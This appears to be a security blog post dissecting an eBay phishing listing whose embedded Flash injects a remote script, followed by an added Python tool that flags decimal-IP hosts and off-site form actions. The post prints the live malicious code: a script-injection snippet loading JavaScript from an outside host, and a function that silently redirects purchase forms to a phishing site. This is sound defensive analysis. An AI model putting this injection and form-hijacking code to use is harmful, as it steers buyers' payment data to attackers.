While reading the Slashdot firehose, I came across a post about possible fraud on eBay. I skimmed the issue and quickly figured out what was going on. However, there seems to be more to it than a simple oversight.
When visiting the item on eBay, after a few seconds the item ID would change; if it weren't for that, no one would be the wiser. The item details contain two pieces of Flash, which eBay allows. Both files are referenced with a simple obfuscation: the host is an IP address written as its decimal equivalent instead of dotted-quad notation. I downloaded the Flash files and ran them through a few decompilers I have access to (being an Information Security Analyst has its perks). In every case the files were so optimized that I couldn't get any clean data out of a decompile. My next trick was to run the SWF files by themselves in IE (hey, it's good for something), which produced a JavaScript error.
Interesting: we have JavaScript in a SWF file. Debugging the error let me see it in plain view. The Flash file was trying to add a new script file to the top of the document body. Since there was no document body, IE barfed.
{
    var e = document.createElement("SCRIPT");
    e.src = 'http://www.bestofstate.org/010807/images/_notes/scrpt.js';
    e.type = "text/javascript";
    document.getElementsByTagName("head")[0].appendChild(e);
    if (start());
}
Taking the next step, I pulled down the script file, and lo and behold, this nice little script changes where the POST data of the Buy It Now form (and some others) is sent, pointing it at a separate website, so an unsuspecting user would not even notice being taken away from eBay! (See snippet.)
function posturi() {
    var d = document;
    var fl = d.forms.length;
    for (var f = 0; f < fl; f++) {
        // eBay's own search, listing and watch forms are left alone so the
        // page keeps behaving normally; every other form is redirected.
        if ((d.forms[f].name != "headerSearch") &&
            (d.forms[f].name != "ListItemForSale") &&
            (d.forms[f].name != "watch_thisItem")) {
            // _xmyPrice is set elsewhere in the script; the listing price is
            // carried along so the fake confirmation page can display it.
            d.forms[f].action = 'http://www.szeskostelec.cz/.fw/ws/BuyConfirm.php?pret=' + _xmyPrice + '';
            d.forms[f].onSubmit = '';
            d.forms[f].method = '';
        }
    }
    // Re-run every second so forms added to the page later are caught too.
    setTimeout('posturi()', 1000);
}
posturi();
Fortunately, the site it references has already been flagged as a phishing site; unfortunately, not all browsers check those blocklists.
This raises a broader concern: any site could be exploited this way. It may block script tags, but if it allows Flash to be embedded, it is still open to the same issue.
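Both tricks described above (the Flash files fetched from a host written as a decimal IP, and the script that rewrites form actions to point off-site) leave marks in the page markup that a static check can catch. The following Python script is an added example written for this post; it is not code from the post, from eBay, or from the phishing kit. It parses a listing's HTML, decodes decimal ("dword") IP hosts back to dotted-quad form, and flags any form that posts to, or any embedded Flash/script loaded from, a host outside an allowlist. The sample HTML, the allowlist hosts and the `phish.example` / `marketplace.example` names are all constructed for the example.

```python
"""
Static audit of an HTML page for two indicators:
  1. active content (Flash/script) or forms referencing a host written as a
     decimal ("dword") IPv4 address, e.g. http://3232235777/ for 192.168.1.1;
  2. forms whose action, or active content whose source, points at a host
     outside an allowlist.
All sample HTML and host names below are constructed for this example.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


def dword_to_dotted(host):
    """Return the dotted-quad form of a decimal-encoded IPv4 host, or None.

    The URL standard's IPv4 parser accepts a single number for the whole
    address, so a host of only digits is a raw IP in disguise.
    """
    if not host or not host.isdigit():
        return None
    value = int(host)
    if value > 0xFFFFFFFF:
        return None
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


# Attribute that may carry a loadable URL or a POST target, per tag.
URL_ATTRS = {
    "form": "action",
    "embed": "src",
    "object": "data",
    "script": "src",
    "iframe": "src",
}


class _Collector(HTMLParser):
    """Collects (tag, url) pairs for every tag in URL_ATTRS, in document order."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in URL_ATTRS and attrs.get(URL_ATTRS[tag]):
            self.refs.append((tag, attrs[URL_ATTRS[tag]]))
        # <param name="movie" value="..."> inside <object> also names a SWF.
        if tag == "param" and (attrs.get("name") or "").lower() == "movie" \
                and attrs.get("value"):
            self.refs.append(("param", attrs["value"]))


def audit_html(html, trusted_hosts):
    """Return a list of (tag, url, reason) findings for the given page."""
    collector = _Collector()
    collector.feed(html)
    findings = []
    for tag, url in collector.refs:
        host = urlparse(url).hostname
        if host is None:
            continue  # relative URL: same origin as the page itself
        host = host.lower()
        dotted = dword_to_dotted(host)
        if dotted:
            findings.append((tag, url, "host is a decimal-encoded IP (%s)" % dotted))
        elif host not in trusted_hosts:
            if tag == "form":
                findings.append((tag, url, "form posts to untrusted host %s" % host))
            else:
                findings.append((tag, url, "active content from untrusted host %s" % host))
    return findings


# Constructed listing page: one search form posting to the site itself, one
# "buy" form hijacked off-site, one SWF fetched via a decimal IP, and two
# legitimate first-party resources.
SAMPLE_LISTING = """
<html><body>
<form name="headerSearch" action="/search"><input name="q"></form>
<form name="buyItNow" action="http://phish.example/ws/BuyConfirm.php"><input name="qty"></form>
<embed src="http://3232235777/item.swf" type="application/x-shockwave-flash">
<object data="http://www.marketplace.example/player.swf"></object>
<script src="http://www.marketplace.example/static/page.js"></script>
</body></html>
"""

TRUSTED = {"www.marketplace.example", "marketplace.example"}


def audit_sample():
    """Run the audit over the constructed listing."""
    return audit_html(SAMPLE_LISTING, TRUSTED)


if __name__ == "__main__":
    for tag, url, reason in audit_sample():
        print("%-6s %-50s %s" % (tag, url, reason))
```

Running the script flags two things in the sample: the `buyItNow` form because its action leaves the trusted hosts, and the `<embed>` because `3232235777` decodes to `192.168.1.1`. The relative `/search` action is left alone, since a relative URL cannot leave the page's own origin. The same allowlist logic could be pointed at any marketplace that lets sellers embed active content; the allowlist, not the blocklist, is what makes the check useful before a phishing site has been reported anywhere.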